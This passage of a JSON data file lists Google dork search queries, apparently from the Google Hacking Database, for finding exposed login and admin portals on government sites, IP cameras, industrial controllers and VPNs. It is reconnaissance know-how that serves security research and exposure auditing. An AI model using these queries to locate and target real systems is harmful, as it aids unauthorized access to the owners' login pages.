Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"webmail Login\"", "description": "# Google Dork: intitle:\"webmail Login\"\r\n# Pages Containing Login Portals\r\n# Date:5/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "site:in inurl:/admin/login", "description": "# Google Dork: site:in inurl:/admin/login\r\n# Pages Containing Login Portals\r\n# Date: 07/11/2021 \r\n# Exploit Author: Arzan Batliwala"}, {"dork": "inurl:gov.in", "description": "# Google Dork: inurl:gov.in\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:MailEnable inurl:\"/Login.aspx\"", "description": "# Google Dork: intitle:MailEnable inurl:\"/Login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date: 7/11/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "inurl:8888 ext:php inurl:login", "description": "# Google Dork: inurl:8888 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 05/11/2021 \r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "inurl:4444 ext:php inurl:login", "description": "# Google Dork: inurl:4444 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "inurl:login.net", "description": "# Google Dork:inurl:login.net\r\n# Pages Containing Login Portals\r\n# Date: 0811/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "site:com inurl:/admin/login", "description": "# Google Dork: site:com inurl:/admin/login\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:.edu.in inurl:login.aspx", "description": "# Google Dork: site:.edu.in inurl:login.aspx\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Mohamed Rahman Shareff S"}, {"dork": "site:.edu.in inurl:login.aspx", "description": "# Google Dork: site:.edu.in inurl:login.aspx\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Mohamed Rahman Shareff S"}, {"dork": "intext:\"untitled\" intext:\"admin\" filetype:php", "description": "# Google Dork: intext:\"untitled\" intext:\"admin\" filetype:php\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "site:gov.in inurl:/admin/login", "description": "# Google Dork: site:gov.in inurl:/admin/login\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Suvendu Dash"}, {"dork": "inurl:80 ext:php inurl:login", "description": "# Google Dork: inurl:80 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "index of:\"customer/login\"", "description": "# Google Dork: index of:\"customer/login\"\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "index of:\"seller/login\"", "description": "# Google Dork: index of:\"seller/login\"\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "site:*.in inurl: admin login", "description": "# Google Dork: site:*.in inurl: admin login\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Ritika Keni"}, {"dork": "inurl:gov.in & (intitle:login | intitle:signin)", "description": "# Google Dork: inurl:gov.in & (intitle:login | intitle:signin)\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "inurl:gov.in & inurl:wp-admin", "description": "# Google Dork: inurl:gov.in & inurl:wp-admin\r\n# Pages Containing Login Portals\r\n# Date: 08/11/2021 \r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "site:*.gov.in inurl:login.jsp", "description": "# Google Dork: site:*.gov.in inurl:login.jsp\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "site:.edu.in inurl:login.php", "description": "# Google Dork: site:.edu.in inurl:login.php\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:.edu inurl:login \"Admin\"", "description": "# Google Dork: site:.edu inurl:login \"Admin\"\r\n# Pages Containing Login Portals\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "inurl:gov.uk & inurl:wp-admin", "description": "# Google Dork: inurl:gov.uk & inurl:wp-admin\r\n# Pages Containing Login Portals\r\n# Date:9/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:smtp3.*.*/login", "description": "# Google Dork: site:smtp3.*.*/login\r\n# Pages Containing Login Portals\r\n# Date: 09/11/2021 \r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "inurl:login.php site:.in", "description": "# Google Dork: inurl:login.php site:.in\r\n# Pages Containing Login Portals\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Login\" intext:\"camera\"", "description": "# Google Dork: intitle:\"Login\" intext:\"camera\"\r\n# Pages Containing Login Portals\r\n# Date:12/11/2021\r\n# Exploit Author: Naveen Venugopal"}, {"dork": "inurl:console/login.jsp", "description": "# Google Dork: inurl:console/login.jsp\r\n# Pages Containing Login Portals\r\n# Date: 12/11/2021 \r\n# Exploit Author: Md Anzaruddin"}, {"dork": "inurl:EMSWebClient/", "description": "# Google Dork: inurl:EMSWebClient/\r\n# Pages Containing Login Portals\r\n# Date: 12/11/2021 \r\n# Exploit Author: Soriful Islam Shoaib"}, {"dork": "inurl admin login php gov.in", "description": "# Google Dork: inurl admin login php gov.in\r\n# Pages Containing Login Portals\r\n# Date: 14/11/2021 \r\n# Exploit Author: Arindam Saha"}, {"dork": "site:*.in inurl:jira login", "description": "# Google Dork: site:*.in inurl:jira login\r\n# Pages Containing Login Portals\r\n# Date:13/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:*.gov.au inurl:wp-admin", "description": "# Google Dork: site:*.gov.au inurl:wp-admin\r\n# Pages Containing Login Portals\r\n# Date: 13/11/2021 \r\n# Exploit Author: Haox Hapot"}, {"dork": "Fwd: intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow \"", "description": "# Google Dork: Fwd: intitle:\"Schneider Electric Telecontrol - Industrial Web Control\" intext:\"Xflow \"\r\n# Pages Containing Login Portals\r\n# Date:14/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl *:8443/login.jsp", "description": "# Google Dork: inurl *:8443/login.jsp\r\n# Pages Containing Login Portals\r\n# Date:15/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intitle:\"Login\" intext:\"cam\"", "description": "# Google Dork: intitle:\"Login\" intext:\"cam\"\r\n# Pages Containing Login Portals\r\n# Date:16/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl:\"*admin | login\" | inurl:.php | .asp", "description": "# Google Dork: inurl:\"*admin | login\" | inurl:.php | .asp\r\n# Pages Containing Login Portals\r\n# Date: 17/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Teltonika -Web UI\" | intitle:\"Teltonika-RUT -Web UI\" inurl:\"/cgi-bin/luci\"", "description": "# Google Dork: intitle:\"Teltonika -Web UI\" | intitle:\"Teltonika-RUT -Web UI\" inurl:\"/cgi-bin/luci\"\r\n# Pages Containing Login Portals\r\n# Date: 16/11/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"Login\")", "description": "# Google Dork: inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"Login\")\r\n# Pages Containing Login Portals\r\n# Date: 17/11/2021 \r\n# Exploit Author: Diego Bardalez Plaza"}, {"dork": "inurl:/intranet/login.php", "description": "# Google Dork: inurl:/intranet/login.php\r\n# Pages Containing Login Portals\r\n# Date: 18/11/2021 \r\n# Exploit Author: Diego Bardalez Plaza"}, {"dork": "intitle:\"Login to SDT-CS3B1\"", "description": "# Google Dork: intitle:\"Login to SDT-CS3B1\"\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl:\"ucp.php?mode=login\"", "description": "# Google Dork: inurl:\".php?cid=\"+intext:\"online+betting\"\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:iDRAC* inurl:login.html", "description": "# Google Dork: intitle:iDRAC* inurl:login.html\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Javier Bernardo"}, {"dork": "Fwd: intitle:\"Web UI\" inurl:\"/cgi-bin/luci\"", "description": "# Google Dork: intitle:\"Web UI\" inurl:\"/cgi-bin/luci\"\r\n# Pages Containing Login Portals\r\n# Date:14/06/2022\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "inurl:/intranet/signup", "description": "# Google Dork: inurl:/intranet/signup\r\n# Pages Containing Login Portals\r\n# Date: 05/12/2021\r\n# Exploit Author: S Rahul"}, {"dork": "inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"hacked\")", "description": "# Google Dork: inurl:/admin/login.php intitle:(\"Iniciar sesion\" OR \"hacked\")\r\n# Pages Containing Login Portals\r\n# Date: 07/12/2021\r\n# Exploit Author: David Bradette\r\n\r\n\r\n\r\n\r\nRegards,\r\n\r\n\r\n\r\nDavid Bradette\r\n\r\nInformation Technology Engineer\r\nE: info@davidbradette.com mailto:info@davidbradette.com | W:http://www.davidbradette.com\r\nCalgary, AB"}, {"dork": "inurl:\"*admin|login\" site: gov", "description": "# Google Dork: inurl:\"*admin|login\" site: gov\r\n# Files Containing Juicy Info\r\n# Date: 09/12/2021\r\n# Exploit Author: Raghava Raju"}, {"dork": "intitle:\"index of\" \" *admin-login.php \"", "description": "# Google Dork: intitle:\"index of\" \" *admin-login.php \"\r\n# Pages Containing Login Portals\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "site:.com intitle:\"Admin portal\"", "description": "# Google Dork: site:.com intitle:\"Admin portal\"\r\n# Pages Containing Login Portals\r\n# Date: 20/12/2021\r\n# Exploit Author: Yuliia Danylovych"}, {"dork": "\"This system\" inurl:login", "description": "# Google Dork: \"This system\" inurl:login\r\n# Pages Containing Login Portals\r\n# Date:16/06/2022\r\n# Exploit Author: JadeWolf"}, {"dork": "intitle:\"SAP Web Application Server\" logon", "description": "# Google Dork: intitle:\"SAP Web Application Server\" logon\r\n# Pages Containing Login Portals\r\n# Date:16/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "inurl:/sap/bc/webdynpro/ logon", "description": "# Google Search: inurl:/sap/bc/webdynpro/ logon\r\n# Pages Containing Login Portals\r\n# Date: 20/01/2022\r\n# Author: Zayed AlJaberi\r\n# Google Dork Description: SAP Web Application Server"}, {"dork": "intitle:\"Login. MicroStrategy\"", "description": "# Dork: intitle:\"Login. MicroStrategy\"\r\n# Page Containing Login Portals\r\n# Date: 30/03/2022\r\n# Exploit Author: Acmello"}, {"dork": "inurl:\"microstrategy/servlet/mstrweb\"", "description": "# Dork: inurl:\"microstrategy/servlet/mstrweb\"\r\n# Category: Page Containing Login Portals\r\n# Date: 30/03/2022\r\n# Exploit Author: Acmello"}, {"dork": "inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login", "description": "# Dork: inurl:/RDWeb/Pages/en-US/ filetype:aspx ~login\r\n# Pages Containing Login Portals\r\n# Date: 4/15/2022\r\n# Exploit Author: Ronnie Bartwitz\r\n# Description: A basic Google Dork to enumerate Remote Desktop gateways. Note that some may be locked behind Microsoft 365/AzureAD."}, {"dork": "intitle:\"ST Web Client\"", "description": "# Google Dork: intitle:\"ST Web Client\"\r\n# Pages Containing Login Portals\r\n# Date: 20/04/2021\r\n# Exploit Author: Nathan Cavitt"}, {"dork": "inurl:\"/sap/admin/public\"", "description": "# Google Dork: inurl:\"/sap/admin/public\"\r\n# Pages Containing Login Portals\r\n# Date: 18/06/2021\r\n# Exploit Author: Pablo Salinas"}, {"dork": "sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com", "description": "# Google Dork: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com\r\n# Pages Containing Login Portals\r\n# Date: 18/06/2022\r\n# Exploit Author: Pablo Salinas"}, {"dork": "intitle:[TM4Web] inurl:login.msw", "description": "# Google Dork: intitle:[TM4Web] inurl:login.msw\r\n# Pages Containing Login Portals\r\n# Date:01/07/2022\r\n# Exploit Author: Lutzenfried"}, {"dork": "inurl:\"opac/login \" site:.edu", "description": "#Google Dork : inurl:\"opac/login \" site:.edu\r\n#Pages Containing Login Portals\r\n#Date : 04/07/2022\r\n#Exploit Author : nafih zain"}, {"dork": "Fwd: site:*/opac/login", "description": "# Google Dork: Fwd: site:*/opac/login\r\n# Pages Containing Login Portals\r\n# Date:06/07/2022\r\n# Exploit Author: nafih zain"}, {"dork": "intitle:\"JupyterHub\" inurl:/hub/login", "description": "# Google Dork: intitle:\"JupyterHub\" inurl:/hub/login\r\n# Category: Pages Containing Login Portals\r\n# Date: 18/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:\"/index.php?qa=login\"", "description": "Google Dork: inurl:\"/index.php?qa=login\"\r\n# Pages Containing Login Portals\r\n# Date:18/07/2022\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:\"Login\" -com \"/doc/page/login.asp\"", "description": "# Google Dork: intitle:\"Login\" -com \"/doc/page/login.asp\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 14/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:_admin \"login\"", "description": "# Google Dork: inurl:_admin \"login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 18/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login page for\" inurl:user.cgi", "description": "# Google Dork: intitle:\"Login page for\" inurl:user.cgi\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"change your SurgeMAIL account settings\"", "description": "# Google Dork: intext:\"change your SurgeMAIL account settings\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Oracle Access Management\" \"login\" -inurl:oracle", "description": "# Google Dork: intitle:\"Oracle Access Management\" \"login\" -inurl:oracle\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login to Redash\"", "description": "# Google Dork: intitle:\"Login to Redash\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login to ICC PRO system\"", "description": "# Google Dork: intitle:\"Login to ICC PRO system\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login - Residential Gateway\"", "description": "Google Dork: intitle:\"Login - Residential Gateway\"\r\n# Pages Containing Login Portals\r\n# Date: 20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"System Administration\" inurl:top.cgi", "description": "#Google Dork: intitle:\"System Administration\" inurl:top.cgi\r\n# Pages Containing Login Portals\r\n# Date:20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "Dork for Employees Self Service(ESS) Login Portals", "description": "# Google Dork: intext:ESS inurl:login\r\n# Pages Containing Login Portals\r\n# Date:20/07/2022\r\n# Exploit Author: Shiva Medituru"}, {"dork": "inurl:443 ext:php inurl:login", "description": "# Google Dork: inurl:443 ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "inurl:http ext:php inurl:login", "description": "# Google Dork: inurl:http ext:php inurl:login\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"Device(IP CAMERA)\" \"language\" -com|net", "description": "# Google Dork: intitle:\"Device(IP CAMERA)\" \"language\" -com|net\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"login to authorize\" \"DynDNS\"", "description": "# intext:\"login to authorize\" \"DynDNS\"\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Synnefo Admin\"", "description": "# Google Dork: intitle:\"Synnefo Admin\"\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:_admin \"login.aspx\"", "description": "# Google Dork: inurl:_admin \"login.aspx\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 25/07/2022\r\n# Exploit Author: MAHIN VM"}, {"dork": "intitle:\"User Authentication : IR*\"", "description": "# Google Dork: intitle:\"User Authentication : IR*\"\r\n# Pages Containing Login Portals\r\n# Date:25/07/2022\r\n# Exploit Author: Luke Stark"}, {"dork": "intitle:'olt web management interface'", "description": "# Google Dork: intitle:'olt web management interface'\r\n# Pages Containing Login Portals\r\n# Date: 08/07/2021 \r\n# Exploit Author: Cyber Shelby"}, {"dork": "inurl:\"admin/default.aspx\"", "description": "# Google Dork: inurl:\"admin/default.aspx\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 07/08/2022\r\n# Exploit Author: Payal Yedhu"}, {"dork": "allintitle:\"Log on to MACH-ProWeb\"", "description": "# Google Dork: allintitle:\"Log on to MACH-ProWeb\"\r\n# Pages Containing Login Portals\r\n# Date: 13/08/2022\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"WEB SERVICE\" \"wan\" \"lan\" \"alarm\"", "description": "# Google Dork: intitle:\"WEB SERVICE\" \"wan\" \"lan\" \"alarm\"\r\n# Pages Containing Login Portals\r\n# Date: 14/08/2022 \r\n# Exploit Author: Heverin Hacker"}, {"dork": "inurl:authorization.do intext:\"ADSelfService Plus\"", "description": "# Google Dork: inurl:authorization.do intext:\"ADSelfService Plus\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intitle:\"NB1601 Web Manager\"", "description": "# Google Dork: intitle:\"NB1601 Web Manager\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"Netgate pfSense Plus - Login\"", "description": "# Google Dork: intitle:\"Netgate pfSense Plus - Login\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"Parallels User Portal\"", "description": "# Google Dork: intitle:\"Parallels User Portal\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: HackerFrenzy"}, {"dork": "allintitle:\"wireless controller login\"", "description": "# Google Dork: allintitle:\"wireless controller login\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "inurl:\"/adfs/ls/\"", "description": "# Google Dork: inurl:\"/adfs/ls/\"\r\n# Pages Containing Login Portals\r\n# Date:31/01/2023\r\n# Exploit Author: Lorenzo Albano Fontanot"}, {"dork": "inurl:\"device.rsp\" -com", "description": "# Google Dork: inurl:\"device.rsp\" -com\r\n# Pages Containing Login Portals\r\n# Date:2/1/2023\r\n# Exploit Author: Simone Gasparato"}, {"dork": "site:cp.*.* intitle:\"login\"", "description": "# Google Dork: site:cp.*.* intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date: 31/10/2022\r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:assystnetmob", "description": "# Google Dork: inurl:assystnetmob\r\n# Pages Containing Login Portals\r\n# Date:13/02/2023\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "intitle:\"index of\" \"login.sh\"", "description": "# Google Dork: intitle:\"index of\" \"login.sh\"\r\n# Pages Containing Login Portals\r\n# Date:13/02/2023\r\n# Exploit Author: Anoop Kumar"}, {"dork": "site:*/AdminLogin.aspx", "description": "# Google Dork: site:*/AdminLogin.aspx\r\n# Pages Containing Login Portals\r\n# Date:15/02/2023\r\n# Exploit Author: Reza Abasi"}, {"dork": "inurl:GeminiVAIdServer", "description": "# Google Dork: inurl:GeminiVAIdServer\r\n# Pages Containing Login Portals\r\n# Date:22/02/2023\r\n# Exploit Author: Prayag Mathukiya"}, {"dork": "inurl:GeminiVAIdServer", "description": "# Google Dork: inurl:GeminiVAIdServer\r\n# Pages Containing Login Portals\r\n# Date:22/02/2023\r\n# Exploit Author: Prayag Mathukiya"}, {"dork": "intitle:\"Ignition Gateway\" \"launch designer\"", "description": "# Google Dork: intitle:\"Ignition Gateway\" \"launch designer\"\r\n# Pages Containing Login Portals\r\n# Date:24/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "site:ap.*.* intitle:\"login\"", "description": "# Google Dork: site:ap.*.* intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date:24/02/2023\r\n# Exploit Author: Sanu Jose M"}, {"dork": "allintitle:\"Eclypse Login\"", "description": "# Google Dork: allintitle:\"Eclypse Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"TutorTrac Login\"", "description": "# Google Dork: allintitle:\"TutorTrac Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"OMERO.web - Login\"", "description": "# Google Dork: allintitle:\"OMERO.web - Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"Untangle Administrator Login\"", "description": "# Google Dork: allintitle:\"Untangle Administrator Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"eSlideManager - Login\"", "description": "# Google Dork: allintitle:\"eSlideManager - Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"Supermicro BMC Login\"", "description": "# Google Dork: allintitle:\"Supermicro BMC Login\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "allintitle:\"Building Operation WebStation\"", "description": "# Google Dork: allintitle:\"Building Operation WebStation\"\r\n# Pages Containing Login Portals\r\n# Date:27/02/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "site:email.*.* intitle:\"login\"", "description": "# Google Dork: site:email.*.* intitle:\"login\"\r\n# Pages Containing Login Portals\r\n# Date:28/02/2023\r\n# Exploit Author: Reza Abasi"}, {"dork": "allintitle:\"Cyberoam SSL VPN Portal\"", "description": "# Google Dork: allintitle:\"Cyberoam SSL VPN Portal\"\r\n# Pages Containing Login Portals\r\n# Date:07/03/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "inurl:guest/auth_login.php", "description": "# Google Dork: inurl:guest/auth_login.php\r\n# Pages Containing Login Portals\r\n# Date:16/03/2023\r\n# Exploit Author: Javier Bernardo"}, {"dork": "allintitle:\"Login | Control WebPanel\" Control WebPanel Login", "description": "# Google Dork: allintitle:\"Login | Control WebPanel\" Control WebPanel Login\r\n# Pages Containing Login Portals\r\n# Date:16/03/2023\r\n# Exploit Author: Aditya Raj Singh"}, {"dork": "inurl:adminpanel site:*.in", "description": "# Google Dork: inurl:adminpanel site:*.in\r\n# Pages Containing Login Portals\r\n# Date:24/03/2023\r\n# Exploit Author: Md rofikul"}, {"dork": "allintitle:\"MobileIron User Portal: Sign In\"", "description": "# Google Dork: allintitle:\"MobileIron User Portal: Sign In\"\r\n# Pages Containing Login Portals\r\n# Date:29/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "allintitle:\"Synapse Mobility Login\"", "description": "# Google Dork: allintitle:\"Synapse Mobility Login\"\r\n# Pages Containing Login Portals\r\n# Date:29/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "allintitle:\"ResolutionMD Login\"", "description": "# Google Dork: allintitle:\"ResolutionMD Login\"\r\n# Pages Containing Login Portals\r\n# Date:29/03/2023\r\n# Exploit Author: Heverin Hacker"}, {"dork": "inurl:/superadmin/login intext:login", "description": "# Google Dork: inurl:/superadmin/login intext:login\r\n# Pages Containing Login Portals\r\n# Date:06/04/2023\r\n# Exploit Author: Himanshu Mehta"}, {"dork": "inurl:\"/sap/bc/gui/sap/its/webgui?sap-client=SAP*\"", "description": "# Google Dork: inurl:\"/sap/bc/gui/sap/its/webgui?sap-client=SAP*\"\r\n# Pages Containing Login Portals\r\n# Date:06/04/2023\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "allintitle:\"Login | wplogin Login", "description": "# Google Dork: allintitle:\"Login | wplogin Login\r\n# Pages Containing Login Portals\r\n# Date: 06/04/2023\r\n# Exploit Author: MD Hasib"}, {"dork": "inurl:cas/login?service=http", "description": "# Google Dork: inurl:cas/login?service=http\r\n# Pages Containing Login Portals\r\n# Date:17/04/2023\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "inurl: \"/admin\" intitle:\"Admin Login\"", "description": "# Google Dork: inurl: \"/admin\" intitle:\"Admin Login\"\r\n# Pages Containing Login Portals\r\n# Date:20/04/2023\r\n# Exploit Author: Bhavin Amesara"}, {"dork": "allintitle:\"Opengear Management Console\"", "description": "# Google Dork: allintitle:\"Opengear Management Console\"\r\n# Pages Containing Login Portals\r\n# Date:05/05/2023\r\n# Exploit Author: GirlsLearnCyber"}, {"dork": "Re: inurl:\"/user\" intitle:\"userlogin\"", "description": "# Google Dork: inurl:\"/user\" intitle:\"userlogin\"\r\n# Pages Containing Login Portals\r\n# Date:31/05/2023\r\n# Exploit Author: Ishak Hasan Sabbir"}, {"dork": "Re: inurl:\"/admin\" intitle:\"adminlogin\"", "description": "# Google Dork: inurl:\"/admin\" intitle:\"adminlogin\"\r\n# Pages Containing Login Portals\r\n# Date:31/05/2023\r\n# Exploit Author: Ishak Hasan Sabbir"}, {"dork": "inurl:\"/login.aspx\" intitle:\"adminlogin\"", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"adminlogin\"\r\n# Pages Containing Login Portals\r\n# Date:02/06/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "inurl:\"/login.aspx\" intitle:\"user\"", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"user\"\r\n# Pages Containing Login Portals\r\n# Date:02/06/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "intitle:\"PaperCut login\"", "description": "# Google Dork: intitle:\"PaperCut login\"\r\n# Pages Containing Login Portals\r\n# Date:02/06/2023\r\n# Exploit Author: SatishKumar Pyata"}, {"dork": "site:co.in inurl:/login.aspx", "description": "# Google Dork: site:co.in inurl:/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:co.in inurl:/admin.aspx", "description": "# Google Dork: site:co.in inurl:/admin.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:.org inurl:/admin.aspx", "description": "# Google Dork: site:.org inurl:/admin.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:.org inurl:/login.aspx", "description": "# Google Dork: site:.org inurl:/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "site:.com inurl:/login.aspx", "description": "# Google Dork: site:.com inurl:/login.aspx\r\n# Pages Containing Login Portals\r\n# Date: 04/07/2023\r\n# Exploit Author: Sachin Gupta"}, {"dork": "inurl:uux.aspx", "description": "# Google Dork: inurl:uux.aspx\r\n# Pages Containing Login Portals\r\n# Date: 28/07/2023\r\n# Exploit Author: Javier Bernardo"}, {"dork": "inurl:tech \"login\"", "description": "\ufeffGoogle Dork: inurl:tech \"login\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2023\r\n# Exploit Ivan Nizer Gonsalves"}, {"dork": "inurl:\"adminLogin/\" intitle:\"Admin Panel\"", "description": "# Google Dork: inurl:\"adminLogin/\" intitle:\"Admin Panel\"\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2023\r\n# Exploit Author: Jose Rivas Aka. Bl4cksku11"}, {"dork": "intext:\"Login\" inurl:/secure", "description": "# Google Dork: intext:\"Login\" inurl:/secure\r\n# Pages Containing Login Portals\r\n# Date: 11/09/2023\r\n# Exploit Shubhranshu Gorai"}, {"dork": "admin panel and open server misconfigure", "description": "# Google Dork: inurl:\"/login.aspx\" intitle:\"user\" intext:\"admin\"\r\n# Pages Containing Login Portals\r\n# Date: 02/10/2023\r\n# Exploit Momin Monis"}, {"dork": "allintitle: \"smart office suite - login page\"", "description": "# Google Dork: allintitle: \"smart office suite - login page\"\r\n# Pages Containing Login Portals\r\n# Date: 02/10/2023\r\n# Exploit Abhilash Gangane"}, {"dork": "Shopping Website Login Pages", "description": "# Google Dork: Shopping Website Login Pages\r\n# Pages Containing Login Portals\r\n# Date: 13/10/2023\r\n# Exploit Prathamesh Kamble"}, {"dork": "inurl:\"/spotfire/login.html\"", "description": "# Google Dork: inurl:\"/spotfire/login.html\"\r\n# Pages Containing Login Portals\r\n# Date: 